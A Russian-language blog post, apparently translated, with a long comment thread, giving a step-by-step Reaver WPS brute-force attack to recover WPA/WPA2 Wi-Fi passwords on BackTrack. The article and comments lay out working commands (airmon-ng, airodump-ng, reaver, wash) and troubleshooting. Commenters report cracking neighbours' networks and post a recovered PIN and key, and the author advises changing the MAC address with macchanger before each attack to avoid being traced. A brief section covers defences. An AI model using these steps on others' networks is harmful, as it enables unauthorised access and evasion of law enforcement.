Как взломать пароль WPA сети Wi-Fi с помощью Reaver


Всем привет!

Из-за того, что все движется и не стоит на месте, решил сказать вам кое какую обновленную информацию. Один из разделов в этой статье говорит о том, как устанавливать reaver на BackTrack 5 R1 и где скачивать сам BackTrack 5 R1. Так вот ничего устанавливать теперь не нужно! Потому что вышел BackTrack 5 R2, в котором reaver уже установлен.

Скачать BackTrack 5 R2 вы можете здесь.

Вот и все касаемо обновления. Приятного чтения!

Wi-Fi сеть является удобным беспроводным шлюзом в Интернет и Вы не заинтересованы в его использовании любым хулиганом, который проходит мимо дома, а поэтому защищаете сеть с помощью пароля, не так ли?

Зная, как легко можно взломать WEP-пароль, Вы,  вероятно, обеспечите безопасность сети с помощью более пуленепробиваемого WPA-протокола безопасности.

Но вот и плохие новости: новый, бесплатный, с открытым исходным кодом инструмент под названием Reaver использует дыру в безопасности беспроводных маршрутизаторов и может относительно легко взламывать текущие пароли большинства маршрутизаторов.

Рассмотрим пошагово, как с помощью Reaver взломать пароль WPA или WPA2 и как защитить собственные сети от атак Reaver.

В первом разделе статьи автор будет идти по ступенькам, необходимым для взлома паролей WPA с использованием Reaver. Вы можете следовать за текстом ниже. После этого автор объясняет, как работает Reaver, и что Вы можете сделать, чтобы защитить свою сеть от атак Reaver.

Во-первых, краткое замечание, которое мы часто напоминаем читателям, когда обсуждаем темы, которые являются потенциально опасными. Знание – это сила, но сила не означает, что Вы должны что-то сломать, или делать что-то незаконное. Знание, как взломать замок, не делают Вас вором. Рассматриваем данную статью как образовательную или доказательство правильности концепции интеллектуального права. Чем больше Вы знаете, тем лучше сможете защитить себя.

Что Вам нужно

Вам не нужно быть администратором сети, чтобы воспользоваться Reaver и инструментами командной строки, которые делают тяжелую работу, и если Вы имеете чистый DVD, компьютер с картой Wi-Fi и несколько свободных часов, то у Вас есть практически все, что нужно. Есть целый ряд способов, с помощью которых Вы могли бы установить Reaver, но есть конкретные требования данного руководства:

  • Как взломать пароль WPA сети Wi-Fi с помощью ReaverBackTrack 5 Live DVD. BackTrack представляет собой загрузочный дистрибутив, который наполнен до краев инструментами тестирования сети, но, хотя это не строго обязательно для использования Reaver, это самый простой подход для большинства пользователей. Скачайте Live DVD со  страницы загрузки BackTrack и запишите его на DVD. Вы можете также загрузить образ виртуальной машины, если используете VMware, но если Вы не знаете, что такое VMware, просто остановитесь на Live DVD. Показанное выше означает, что Вы должны выбрать BackTrack 5 R1 в списке выпусков, выбрать Gnome, 32 – или 64-битный, в зависимости от Вашего процессора (если не знаете, какой у Вас, то безопаснее выбрать 32), ISO для образа, а затем загрузить ISO.
  • Компьютер с Wi-Fi и привод DVD. BackTrack работает с беспроводной картой на большинстве ноутбуков, поэтому вероятно, что ноутбук будет работать нормально. Тем не менее, BackTrack имеет не полный список совместимости, а поэтому никаких гарантий. Вам также понадобится дисковод DVD, поскольку из него Вы будете загружаться в BackTrack.
  • Размещена недалеко Wi-Fi сеть с WPA-защитой. Технически, это должна быть сеть с использованием WPA-защиты и включенная WPS. Автор объясняет подробнее в разделе “Как работает Reaver”, как WPS создает брешь в системе безопасности, что делает возможным взлом WPA.
  • Немного терпения. Это 4-х ступенчатый процесс и хотя не очень сложно взломать пароль WPA с Reaver, но это атака грубой силы, которая означает, что Ваш компьютер будет проверять много разных комбинаций для взлома маршрутизатора, прежде чем найдет правильную. Когда тестировал автор, то Reaver понадобилось около 2,5 часов, чтобы успешно взломать пароль. Домашняя страница Reaver предполагает, что это может занять 4-10 часов. Ваша оценка может измениться.

Давайте взламывать!

В этот момент Вы уже должны иметь записанный DVD с BackTrack и свой ноутбук под рукой.

Шаг 1: Загрузка BackTrack

Как взломать пароль WPA сети Wi-Fi с помощью ReaverЧтобы загрузиться с BackTrack, просто вставьте DVD в дисковод и загрузите машину с диска. (Используйте Google, если вы ничего не знаете о дисках Live CD/DVD и Вам нужна помощь в этой части.) Во время процесса загрузки BackTrack Вам будет предложено выбрать режим загрузки. Выберите “BackTrack Text – Default Boot Text Mode” и нажмите Enter.

Наконец, BackTrack загружается в командной строке. Когда Вы увидите в строке курсор, введите команду startx и нажмите Enter. BackTrack будет загружен в своем графическом интерфейсе.

Шаг 2: Установка Reaver

В командной строке введите:

apt-get update

Затем, после завершения обновления:

apt-get install reaver

Как взломать пароль WPA сети Wi-Fi с помощью ReaverЕсли все прошло хорошо, то теперь Reaver должен быть установлен. Это может казаться немного хромым, но Вам было необходимо подключение к сети, чтобы установить Reaver, но теперь он будет оставаться установленным, пока Вы не перезагрузите компьютер.

Шаг 3: Соберите информацию об устройстве, подготовьте Ваш взлом

Для того, чтобы использовать Reaver, Вам необходимо получить имя интерфейса беспроводной карты, BSSID маршрутизатора, который Вы пытаетесь сломать (BSSID – это уникальная последовательность букв и цифр, который идентифицирует маршрутизатор), и Вы должны убедиться, что Ваша карта беспроводной сети находится в режиме мониторинга. Давайте все это сделаем.

Найдите Вашу беспроводную карту: Внутри Terminal, введите:

iwconfig

Как взломать пароль WPA сети Wi-Fi с помощью ReaverНажмите клавишу Enter. Вы должны увидеть мобильное устройство в дальнейшем список. Скорее всего, это будет имя wlan0, но если у Вас есть несколько беспроводных карт или необычные сетевые настройки, то название может быть другое.

Переведите Вашу беспроводную карту в режим мониторинга: Предположим, что имя интерфейса Вашей беспроводной карты есть wlan0, тогда выполните следующую команду, чтобы перевести беспроводную карту в режим мониторинга:

airmon-ng start wlan0

Эта команда выведет имя интерфейса режима мониторинга, которое Вы также должны знать. Скорее всего, это будет mon0, как показано на рисунке ниже. Обратите на это внимание.

Как взломать пароль WPA сети Wi-Fi с помощью ReaverНайдите BSSID маршрутизатора, который Вы хотите взломать: Наконец, Вам необходимо получить уникальный идентификатор маршрутизатора, который Вы пытаетесь взломать, чтобы Вы могли указать Reaver правильное направление. Для этого выполните следующую команду:

airodump-ng mon0

Вы увидите список беспроводных сетей вокруг Вас – это выглядит как на скриншоте ниже:

Как взломать пароль WPA сети Wi-Fi с помощью ReaverКогда увидите необходимую сеть – нажмите Ctrl + C, чтобы остановить обновление списка и скопируйте BSSID данной сети (это последовательность букв, цифр и двоеточий в крайнем левом столбце). Сеть должны иметь WPA или WPA2, перечисленные в колонке ENC. (Если это WEP, то используйте предыдущее руководство по взлому WEP паролей).

Теперь, с BSSID и именем интерфейса монитора в руках у Вас есть все необходимое для запуска Reaver.

Шаг 4: Crack пароля WPA-сети с помощью Reaver

Теперь выполните следующую команду в терминале, заменив BSSID и moninterface интерфейсом BSSID и монитором, которые скопированы выше:

reaver -i mon0 -b bssid -vv

Например, если Ваш интерфейс монитора mon0, как у автора, и Ваш BSSID 8D:AE:9D:65:1F:B2 (BSSID автор выдумал), то Ваша команда  будет выглядеть так:

reaver -i mon0 -b 8D:AE:9D:65:1F:B2 -vv

Нажмите клавишу Enter и сидите, сложа руки, а Reaver пусть выполняет свою работу тревожной магии. Reaver теперь будет пытаться посылать серии PIN-кодов на маршрутизатор с перебором всех вариантов, один за другим. Это займет некоторое время. В успешном испытании автора Reaver потратил 2 часа 30 минут, чтобы взломать сеть и выдать автору правильный пароль. Как упоминалось выше, документация Reaver утверждает, что это может занять от 4 до 10 часов, поэтому на это уйдет больше или меньше времени, чем у автора. Когда Reaver завершит взлом, то это будет выглядеть следующим образом:

Как взломать пароль WPA сети Wi-Fi с помощью ReaverНесколько важных факторов, для рассмотрения: Reaver работал именно так, как рекламируется, в тесте автора, но это не обязательно будет работать на всех маршрутизаторах (см. подробнее ниже). Кроме того, для крекинга Ваш маршрутизатор должен иметь относительно сильный сигнал, так что, если Вы не в зоне уверенной работы маршрутизатора, то, вероятно, возникнут проблемы и Reaver может не работать. В течение всего процесса Reaver иногда делает тайм-аут, иногда зацикливается, проверяя PIN-код повторно, и так далее. Автор просто позволил программе продолжать работать, и все это было близко к маршрутизатору, и в конце концов он выполнил свою работу до конца.

Также следует отметить, что Вы можете также остановить свое продвижение в любой момент, нажав Ctrl + C при работе Reaver. Это позволит выйти из процесса, но Reaver сохраняет любой прогресс, так что в следующий раз, когда выполните команду, Вы можете подобрать, где остановились, до тех пор, пока Вы не выключите компьютер (который, если Вы работаете с Live DVD, будет полностью сброшен (reset).

Как работает Reaver

Теперь, когда Вы увидели, как использовать Reaver, давайте сделаем краткий обзор того, что делает Reaver. Инструмент использует уязвимость под названием Wi-Fi Protected Setup, или WPS. Это функция, которая существует на многих маршрутизаторах, предназначенная для обеспечения простого процесса установки и жестко связана с PIN устройства. Reaver эксплуатирует недостаток в этих PIN-кодах: результатом является то, что за достаточное время, он может раскрыть свой WPA-или WPA2-пароль.

Читайте подробности об уязвимости в замечательном посте Шон Галлахер на Ars Technica.

Как защитить себя от атак Reaver

Поскольку уязвимость заключается в реализации WPS, то Ваша сеть должна быть безопасной, если можно просто выключить WPS (или, еще лучше, если Ваш маршрутизатор не поддерживает WPS). К сожалению, как на это указывает Галлахер на Ars, даже с вручную выключенным WPS через настройки своего маршрутизатора, Reaver был еще в состоянии сломать его пароль.

В телефонном разговоре, Крейг Хеффнер заявил, что неспособность закрыть эту уязвимость широко распространена. Он и другие нашли, что это происходит с каждыми Linksys и Cisco Valet беспроводными точками доступа, которые они тестировали. “На всех маршрутизаторах Linksys, вы не можете вручную отключить WPS”, сказал он. В то время как веб-интерфейс имеет переключатель, который якобы отключает конфигурацию WPS “, но они и дальше, по-прежнему уязвимы.

Так что, вроде, облом. Вы может все еще хотите попробовать отключить WPS на маршрутизаторе, если есть такая функция, и проверить его через Reaver, чтобы увидеть помогает ли это?

Кроме того, можно настроить фильтрацию MAC-адреса маршрутизатора (который позволяет только специальный белый список устройств для подключения к сети), но даже не очень опытные хакеры смогут обнаружить МАС-адрес из белого списка устройств и использовать спуфинг с MAC-адресом «белого» компьютера.

Двойной облом. Так что же будет работать?

У автора ??на маршрутизаторе установлена прошивка DD-WRT  с открытым исходным кодом и она не позволила взломать пароль, используя Reaver. Как оказалось, DD-WRT не поддерживает WPS, так что есть еще одна причина сторонникам полюбить бесплатный маршрутизатор. Если Вы заинтересовались DD-WRT, проверьте список поддерживаемых им устройств, чтобы увидеть, поддерживается ли Ваш маршрутизатор. Это хорошее обновление безопасности, и DD-WRT может также делать другие классные вещи такие, как мониторить использование Интернета, создать сетевой жесткий диск, задействовать для всего дома блокировку рекламы, увеличить радиус действия Wi-Fi сети и многое другое. Это существенно поможет Вам превратить маршрутизатор за $60 в маршрутизатор за $600.

Дополнительная литература

Благодаря этому сообщению с Mauris Tech Blog мы получили очень простую отправную точку для использования Reaver. Если Вы заинтересованы в чтении больше, смотрите:

Пользователь Reddit Jagermo (которого автор кратко упоминал при исследовании Reaver) создал  общественный spreadsheat, пытаясь построить список уязвимых устройств. Таким образом, Вы можете проверить склонен ли Ваш маршрутизатор взламываться посредством Reaver.

Чтобы следить за статьями блога, оформляйте подписку по E-MAIL или RSS.

Источник: www.isearch.kiev.ua

Дополнительные материалы:

Comments

  • Roman says:

    Перед этой строчкой “Вы увидите список беспроводных сетей вокруг Вас – это выглядит как на скриншоте ниже” вместо “wlan0″ нужно написать “mon0″. Я сутки не мог понять, почему я дальше не могу продвинуться.

    • hub-lex says:

      да правильно, что то не заметил, когда вставлял. сейчас все исправлено.

  • rex says:

    Это все отлично, на как быть, если нет доступа к инету для установки Reaver

  • NET says:

    Утверждение о том, что “Reaver уже добавлен в последнюю версию BackTrack” не выдерживает критики. Нету там Reaver, хоть пукни. Приходится устанавливать.
    Но, за статью большой респект!!!

  • kevin09 says:

    у меня єсть wep но к ней никак подключитса нельзя да идругова адаптера(карти) не видит realink 3070 до reavera дошел до установки а дальше никак может чтота делаю ни так подскажите пожалуста…

    • hub-lex says:

      вы не могли бы поделить на предложения ваш комментарий, а то, что то мне ничего не понятно.

  • kevin09 says:

    hub-lex ща постараюсь описать по подробниє. Загрузил диска и когда уже дашол штоб загрузить reaver, подключаюсь до сети, у меня есть wep на какой я сижу, чтоби подключитса вважу паролю пишет bed password ,когда нажимаю coneect.С адаптером уже разабралса все идьот харашо.

    • hub-lex says:

      вы хотите с помощью reaver подключиться к точке доступа с шифрованием WEP?

      reaver нужен для взлома pin-кода. так же на роутере должен работать WPS, без него ничего не получится и шифромание WPA/WPA2. чтобы проверить работает ли WPS, необходимо воспользоваться walsh:
      walsh -i mon0

      по взлому WEP, читайте статьи:
      Взлом Wi-Fi сети – часть 1
      Взлом Wi-Fi сети – часть 2
      Взлом Wi-Fi сети – часть 3
      Взлом Wi-Fi сети – часть 4

  • kevin09 says:

    Чтобы установить Reaver, сначала необходимо подключиться к Wi-Fi сети, для которой у Вас есть пароль. Ета с шага 2 скопировал я немогу подключитса к сети штоб загрузитьReaver….

    • hub-lex says:

      в статье были неточности, которые исправлены.
      для установки reaver вам нужно быть подкл. к Интернет. просто вставьте LAN или что вы используйте.
      потом команды установки. далее действуйте по шагам.

      если у вас будут дополнительные вопросы, можете связаться со мной по skype’y: hub-lex-21

  • Andrey says:

    Статья пупер! :smile:
    Вот, еще бы по установку walsh в BT5r1GNOME и как его юзать?

    • hub-lex says:

      walsh устанавливается вместе с reaver. в установке нет ничего сложного:

      1. скачивайте reaver с офф-сайта (http://code.google.com/p/reaver-wps/downloads/list)
      2. читаете файл README (секция Install)
      3. делайте шаги из секции Install. вот и все. но может быть такое, что придется доустановить еще некоторые библиотеки.

      p.s.: если наберется 10 комментариев о том, что установка reaver не понятна, тогда буду делать статью по этопу поводу.

      • Andrey says:

        BT5r1GNOME стоит второй системой и все равно walsh не могу установить. Все красиво: установил Reaver 1.4 – работает, и walsh установил вроде…, и скомпилил билд из SVN вот так:

        # svn checkout http://reaver-wps.googlecode.com/svn/trunk/ reaver-wps-read-only
        # cd reaver-wps-read-only/src
        # ./configure
        # make
        # make install

        А все равно пишет “walsh: command not found”, пичалька однако. Проблема с драйвером? Но команда, то должна быть?

        • hub-lex says:

          walsh была в сборке reaver v1.3 (не знаю почему так)
          посмотрите не walsh, а wash. должна находиться в /usr/local/bin

          • Andrey says:

            Мля! ВОТ, подиж догадайся. Конечно же “WASH”, а не walsh. Все копытит, большое ВАМ спасибо! :mrgreen:

          • hub-lex says:

            Без проблем! Рад был помочь.
            Будут вопросы обращайтесь.

          • Soner says:

            Andrey – wash -i mon0

  • rex says:

    Спасибо за статью. Лучшая на сегодня.
    Поясню свой вопрос по Reaver
    ————–
    rex 26 Январь 2012 в 14:55
    Это все отлично, на как быть, если нет доступа к инету для установки Reaver
    —————–
    Запуск reaver при загрузке с Live-cd подразумевает зависимость от уже имеющегося подключения к интернету.
    Ваша цитата:
    ____
    Если все прошло хорошо, то теперь Reaver должен быть установлен. Это может казаться немного хромым, но Вам было необходимо подключение к сети, чтобы установить Reaver, но теперь он будет оставаться установленным, пока Вы не перезагрузите компьютер.
    ______
    А в ситуации в чистом поле, когда подключиться к инету для активации reaver нет? Уже как-то “не Айс” :)Или я что-то не понял?

    • hub-lex says:

      сейчас скачиваю backtrack 5 r1, чтобы проверить есть ли reaver в нем. но скорее всего его не будет. поэтому придется reaver устанавливать.

      что касается ситуации в чистом поле, то могу предложить установить backtrack второй системой (так многие делают)… или установить reaver и aircrack-ng в вашу рабочую систему, у меня это Debian.

      так же не обходим стороной статью “Reaver. Взлом Wi-Fi сети

      • hub-lex says:

        как и предполагалось reaver не установлен. так что придется устанавливать:
        # apt-get update
        # apt-get install reaver

        p.s.: когда я собирал reaver 1.3, вместо wash была walsh, теперь вроде все впорядке.

      • rex says:

        Вопрос, м.б. не в тему, сорру: При загрузке ВТ5 с Live-Cd все отлично работает, но при установке ВТ в виртуальную машину – система не видит wi-fi адаптер. Может такое быть или надо лечить руки? (Комп у меня старенький)

  • rex says:

    Господа, подскажите,плз, что значит данная надпись после запуска Rever:
    #reaver -i mon0 -b XX:XX:XX:xx:xx:xx -vv
    ! WARNING : Fialed to associate with XX:XX:XX:xx:xx:xx (ESSID: VASIA)
    ! WARNING : Fialed to associate with XX:XX:XX:xx:xx:xx (ESSID: VASIA) ну и т.д

    • hub-lex says:

      несколько вопросов:
      1. вы точно уверены, что AP поддерживает WPS? чтобы проверить, воспользуйтесь командой wash:
      wash -i mon0 --scan
      2. на каком расстоянии находитесь от AP?

      • rex says:

        Как оказалось, сообщение “! WARNING : Fiаled to associate with XX:XX:XX:xx:xx:xx (ESSID: VASIA)” обозначает фильтрацию точки по МАС-адресу, но вот как эту проблему обойти в Reaver, я что-то пока не понимаю…

        • hub-lex says:

          если происходит фильтрация по MAC, то вам нужно воспользоваться программой macchanger. если у вас возникнут с этим тружности, можете позвонить мне в скайп: hub-lex-21

        • Вера says:

          у меня та же проблема но команды wash не существует есть wlash но при наборе такой команды там ниче нет. только прочерки. это означает что взламать невозможно??значит не поддерживает???

          • hub-lex says:

            Покажите, что вы вводите. Постарайтесь дать ответ более детально.

          • Вера says:

            набираю команду в программе wifiway walsh -i mon0 нажимаю ентер и появляеться BSSID Channel RSSI WPS Version WPS Locked ESSID
            ————————————————————————————————————— и больше ничего. это означает что длинк не поддерживает впс???т.е. взломать никак?? и при реавере долго висит надпись о ассоциации и ничего не происходит. что делать???

          • hub-lex says:

            Значит у на AP не работает WPS.
            А reaver так и будет подключаться. Еще раз повторяю ВСЕМ! Сначала проверяйте wash, а только потом включайте reaver.

          • Вера says:

            после черточек пишет found packet with bad FCS. skiping… типа того

  • greed says:

    скажи плиз !!!
    reaver вшит в образ BT5R1-GNOME-32.iso ????
    если нет – то дай подробную инструкцию для интегрирования!!!!!

  • Вячеслав says:

    Спасибо автору за статью.Решил попробовать применить.Reaver пыхтел долго и не спеша,примерно 1% за 25 мин.Общее время на взлом составило около 42 час,и пароль из 10 цифр и букв был найден. :grin:

  • Вячеслав says:

    Расстояния я не знаю,но ноутбук по значку интернета показывает,что сигнал “отличный”.

    • hub-lex says:

      Расстояние это главный фактор в этом деле, но если у вас сигнал отличный, то наверное здесь, что то другое. В любом случае у вас получилось и это хорошо.

      • Трафим says:

        Все прочитал все включилось обновил reaver но не идет пишет 0.00% complete . всю ночь работал также 0. может правда далековато ??? показывает сигнал 2-3 деления . Вроде все разжевал толково hub-lex а положить в рот ни как не получается – обидно как-то . Пишет так : Warning:Receive timeout occurred -Sending:eapol start request Trying pin 12345670 Sending WSC NASK Warning: 25 successive start failures

        • hub-lex says:

          Если вы только начинаете осваивать это дело, советую вам поэкспериментировать на своей AP.

  • Вячеслав says:

    Я хотел бы побольше повозиться с BackTrack,но не знаю, как его загрузить в виде одного файла на диск D,а в загрузочной записи были бы только три варианта:Windows 7,Ubuntu,BackTrack.В противном случае мои внуки голову сломают.

    • hub-lex says:

      А если установить BackTrack 5 на виртуальную машину? Или сделать Life USB?
      Так же вы можете зайти на сайт BackTrack в раздел “HOW TO“. Там много чего написано про то, что можно сделать с дистрибутивом.
      Желаю удачи! Будут вопросы обращайтесь.

  • sergej says:

    У меня следущая проблема : всё запустил, поставил reaver, решил просканировать пишу wash – imon0 –с пишет следущее – (Found packet with bad FCS, skipping), Windows показывае,т что защита на маршрутизаторе WPA-PSK, ок загрузил опять BACK TRACK, выполнил все необходимые операции дал команду #reaver -imon0 –b 02:02:CF:5А….. пишет [+] Waiting for beacom from 02:02:CF …..
    и всё… оставил комп на ночь ничего не изменилось, нажал Ctrl+C – [+] Nothing done, nothing to save. Я что то делаю не так ? или руки не от туда у меня ? или пробл?ма в точке доступа? (сигнал стабил?ый – 35% ) Заранее балгодарю за ответ !

    • hub-lex says:

      Вы точно уверены, что на AP есть WPS? Во многих (почти всех) документах говориться о том, что необходимо как минимум хороший сигнал.
      Попробуйте для начала “поиграть” с опциями reaver’a. Посмотрите раздел “USAGE” тут.

      p.s.: aппаратная часть некоторых AP не очень хорошая: кэш, объемом памяти.

  • Рус says:

    hub-lex, спасибо большое за подробный и очень интересный материал.
    Хотелось бы узнать о безопасности взломщика.
    могут ли его идентифицировать при попытке(успешной или нет) взлома?
    Как защититься? и какие могут быть последствия, если, скажем, попытаться сломать WiFi соседей?
    Спасибо

    • hub-lex says:

      Большое спасибо!

      Главная угроза взломщика в этом деле – WIDS (Wireless Intrusion Detection Systems) Системы Обнаружения Беспроводных Атак, о которых можно почитать в Сети. Они устанавливаются в банках и крупных компаниях, которым есть что терять при взломе и которые заботятся о своей безопасности. Но WIDS могут быть так же не эффективны, если у взломщика есть узконаправленная антенна с коэффициентом усиления 15-25 dbi.

      Домашним пользователям это не нужно поэтому здесь все гораздо проще. Единственное, о чем необходимо заботиться, так это о вашем MAC-адресе (про WIDS это тоже касается). Как известно они уникальны. И поверьте, что выйти силовым структурам на человека по этому адресу не представляет особой трудности! Поэтому перед каждым взломом пользуйтесь такой программой, как macchanger. Информацию о программе можно найти тут.

  • Svit says:

    такой вопрос
    у меня дошло до 20% и все застыло на этом этапе
    switching mon0 to channel 2
    switching mon0 to channel 3
    switching mon0 to channel 4
    ——-по порядку———-
    switching mon0 to channel 14
    что это означает? стоит ли ждать?
    пробовал перезапускать таже история.

  • Svit says:

    после паузы
    reaver -i mon0 -b xx:xx:xx:xx:xx:xx -vv
    пошло изминение значений до:
    switching mon0 to channel 14
    и ступор.

  • Oleg says:

    а у меня такой вопрос
    пришлось остановить и после запустить.
    значения постоянно меняются,но проценты не
    растут (остаются прежними которые набрались
    до перезапуска)

    • hub-lex says:

      попробуйте подождать или сделайте все сначала. иногда такое случается…

      и не забывайте про то другие опции reaver’a! попробуйте поэкспериментировать. и не забывайте заходить на официальные сайты программ!

      по поводу опций и эксперимента, почитайте вот это: http://code.google.com/p/reaver-wps/wiki/README

  • zero says:

    да. пиши так reaver -i mon0 -b xx:xx:xx:xx:xx:xx -с 6 -vv

  • kevin09 says:

    встановив BackTrack другой операционной системой а щас пишет призагрузке BackTrack 5 R1-code name revolution 32bitbt tty1
    bt login
    password
    что ввадить подскажи пожалуста hub-lex

    • hub-lex says:

      Что то не могу понять. Система предлагает ввести вам логин и пароль? Если так, то:
      login: root
      pass: toor
      запустить Х’ы: startx

      если вы имели, что то другое, тогда напишите по шагам, что вы делали и что вам нужно.

  • kevin09 says:

    на cd у меня єсть BackTrack зашол с него загрузилса Патом внутри него єсть install BackTrack зашел в него
    і решил встановить на компа но в конце загрузки пишет:
    BackTrack 5 R1-code name revolution 32bitbt tty1
    вважу логин login: root но пороль не магу ввести

  • kevin09 says:

    password не вводитса кагда жму enter
    login incorrect

    • hub-lex says:

      В *NIX ОС, когда вводите пароль его не видно. Это сделано специально, чтобы никто не смог посмотреть, какой длины пароль.

      В BackTrack логин = root; пароль = toor.

  • kevin09 says:

    в обшем когда встановил BackTrack. При загрузке
    операнионной системи спрашивает login и password

  • ZERO says:

    ЛОГИН ROOT ПАСС TOOR ЕСЛИ БУВЫ НЕ БУДУТ ПИЧАТАТСЯ ЭТО НОРМАЛЬНО .

  • kevin09 says:

    hub-lex спасиба все нормально
    логин = root; пароль = toor. подошли. Извини что отнял у тебя время.СПС

  • royce says:

    У меня такая проблема reaver на 94% выдал cracked и pin 13984142 psk 2ce32506d91b96ff308527ed93ff327beadfc7e7cbf64706e161c3437a534b16
    этот пароль не пошел конечно на соседский wi-fi кто с таким сталкивался? и что нужно делать дальше при таком раскладе? запустил дальше и ничего дошел до 99,9% потом все выдает warning, у кого такое было?

    • hub-lex says:

      Привидите скриншот пожалуйста или сообщение об ошибке, а то от слова warning толку мало =)

    • timon says:

      у меня такая же ерунда… что делать ???? помогите =(

  • royce says:

    скриншот увы уже упустил сделать но выдает такое WARNING: Receive timeout occurred
    ну я уже надыбал инфу по этой ошибке, все понял но вот не нашел насчет psk:2ce32506d91b96ff308527ed93ff327beadfc7e7cbf64706e161c3437a534b16
    если он такое выдает по завершению своей работы то кажись неверно работает reaver, и неверный пароль идет , может пароль среди этих цифр :)))
    использую backtrack 5r1 gnome reaver 1.4
    что можете сказать насчет cracked psk из 64 символов приведенных мной выше ?

    • hub-lex says:

      Посмотрите на последний листиг вот этой статьи: http://www.levinkv.ru/reaver-vzlom-wi-fi-seti/
      …красным цветом выделен пароль. У вас так же? Если да, то это и есть пароль, который вы ищите. Если это не то, тогда можете позвонить мне в skype: hub-lex-21 …постараюсь помочь.

  • royce says:

    [+] WPS PIN: ’13984142′
    [+] WPA PSK: ’2ce32506d91b96ff308527ed93ff327beadfc7e7cbf64706e161c3437a534b16′
    [+] AP SSID: ‘Zyxel’
    пробовал уже этот пароль, не пошел он на соседский wi-fi я, да и не думаю что сосед такой пароль бы сделал, попробую еще раз reaverom если не получиться или выдаст что то в этом роде , свяжусь с вами. спс за внимание.

    • hub-lex says:

      Это странно, потому что это и есть пароль…попробуйте тогда еще раз.
      Без проблем.

      • Wlan says:

        у меня такаяже ситуация два раза перезапускал,
        каждый раз выдавало разный пароль
        неподходящий к сети
        почему!???

  • Krios says:

    Доброго времени суток!
    Возникла следующая проблема:при запуске reaver -i mon0 -b хх:хх:хх:хх:хх:хх -vv выдает следующее:
    Associated with хх:хх:хх:хх:хх:хх (EESID: ketevani)
    Trying pin 12345670
    Sending EAPOL START request
    Received indentity request
    Sending identity response
    И все дальше ничего.Прождал полчаса,без изменений. Помогите пожалуйста!

  • kevin09 says:

    hu b-lex подключаюсь к сети, ее викидивает из сети, слишал что срабативает защита такоє возможно?

    • hub-lex says:

      Саму AP выкидывает? С таким кажется не сталкивался… Покажите, какие сообщения выдаются.

  • Oleg says:

    со второй попытки удалось получить желаемый результат за(34час)
    решил поэксперементировать на других ESSID:
    и вот новый вопрос-
    в 1м случаи – WARNING: Failed to associate with 00:13:33:33:33:37 (ESSID: …

    в 2м случаи – Аssociated with 00:11:22:33:44:55 (ESSID: …

    прождал пару часов в обоих случаях-стоит без изменений,пробовал указать канал таже история

    Почему одни ESSID пингуются а другие нет.

    • hub-lex says:

      Поздравляю!
      Вы так же должны следить за такими параметрами, как: уровень сигнала и проверять работает ли WPS на AP. Если вы будите находится далеко от AP (уровень сигнала средний/слабый) сорее всего у вас ничего не получится. Проверить, работает ли WPS на AP можно программой wash.

  • Oleg says:

    cамое интересное то что удачная попытка прошла на хорошем сигнале, а 2ве следующие на очень хорошем
    никак.спасибо за внимание

  • kevin09 says:

    wash -i mon0 –scan проверил и понял почему никого сламать не могу . :cry:

  • kevin09 says:

    может ктота знает другиэ програми спасиба автору.

  • kevin09 says:

    да эсть сети но с очень слабим сигналом…

  • kevin09 says:

    щас ломаю пасмотрим что вийдет…

  • kevin09 says:

    зря видна ищо один комп купил.

  • Andrej says:

    Подскажите такая проблема
    после ввода команды
    reaver -i mon0 -b **:**:**:**:**:** -vv
    пишет reaver: command not found
    что я делаю неправильно?

    • hub-lex says:

      у вас установлен reaver?
      от какого пользователя идет запуск программы? попробуйте запустить reaver от имени root.

      • Andrej says:

        Reaver установлен. ну тоесть я его устанавливаю каждый раз, когда вставляю диск BackTrack 5 R1 и перезагружаю ноут, а так я все делаю как описано выше, и все получается до того момента когда ввожу
        reaver -i mon0 -b **:**:**:**:**:** -vv
        и нажимаю enter. запуск программы root@root

        • hub-lex says:

          Как вы устанавливайте reaver?
          Он у вас точно установлен?
          Попробуйте запустить reaver без параметров, потому что если вы установили reaver, странно то, что выдается сообщение “reaver: command not found“.

          • Andrej says:

            Да действительно я не установил REAVER. Подскажите как это правильно сделать если интернет проводной. Скачал reaver-1.4.tar.gz что с ним дальше делать, читал статью “Установка reaver в BackTrack 5 R1″ чет не получается. Можно поподробние про установку Reaver. Зарание спасибо.

          • hub-lex says:

            Можно, но если статья по установке reaver вам не помогла, тогда обращайтесь на прямую Skype: hub-lex-21

  • Xpander says:

    Всё сделал как в описано в статье, в результате:
    [+] Waiting for beacon from XX:XX:XX:XX:XX:XX
    [+] Switching mon0 to channel 1
    [+] Associated with XX:XX:XX:XX:XX:XX (ESSID: XXXXXX)

    вот такая надпись, 30 минут без изменений
    посмотрел в соседней статье http://www.levinkv.ru/reaver-vzlom-wi-fi-seti/

    вот этой строчке у автора нет:
    [+] Switching mon0 to channel 1

    может в ней проблема ?

    • hub-lex says:

      Switching mon0 to channel 1
      это значит, что интерфейс mon0 переключился на канал 1…в этом нет проблемы

      30 минут без изменений
      какой уровень сигнала до AP?
      покажите команду, которую вводили…

      • Xpander says:

        Уровень сигнала до AP 100%, т.к. пробую на своей точки.
        Пробовал команду wash-скан пишет:
        Found packet with bad FCS, skipping
        может AP не поддерживает WPS ? как это узнать
        вообщем у меня в точности такая же проблема как и у:
        sergej 14 Февраль 2012 в 14:57

  • Xpander says:

    Автору блога мега уважуха и большое спасибо, за отзывчивость, хоть у меня и ничего не получилось на своей точки из за не поддержки WPS, буду пробовать на соседских.

  • Максим says:

    Автору спасибо.
    У меня проблема, как прокоментируете?
    Проблем с ВЕП нет. А вот ВПА и ВПА2 не поддаются, по причине:

    root@root:~# reaver -i mon0 -b 14:D6:4D:83:9F:5A -vv

    Reaver v1.3 WiFi Protected Setup Attack Tool
    Copyright (c) 2011, Tactical Network Solutions, Craig Heffner

    [+] Waiting for beacon from 14:D6:4D:83:9F:5A
    [+] Switching mon0 to channel 13
    [!] WARNING: Failed to associate with 14:D6:4D:83:9F:5A (ESSID: KONAN)

    на любой сети пишет на своей так же.
    -менял бэктрек с 5 по поледний 5 Р2 – ноль
    -менял реавер с 1 до ревизии – ноль
    -пробывал на 2м ноуте – тоже ноль результата.
    Я выше читал комент, но полезного от самого разраба реавера не нашел, пробовал все.

    • hub-lex says:

      Покажите, что выдает команда wash -i mon0
      Какой уровень сигнала?

      • Максим says:

        root@bt:~# wash -i mon0

        Wash v1.4 WiFi Protected Setup Scan Tool
        Copyright (c) 2011, Tactical Network Solutions, Craig Heffner

        BSSID Channel RSSI WPS Version WPS Locked ESSID
        ---------------------------------------------------------------------------------------------------------------
        14:D6:4D:83:9F:5A 13 -37 1.0 No KONAN
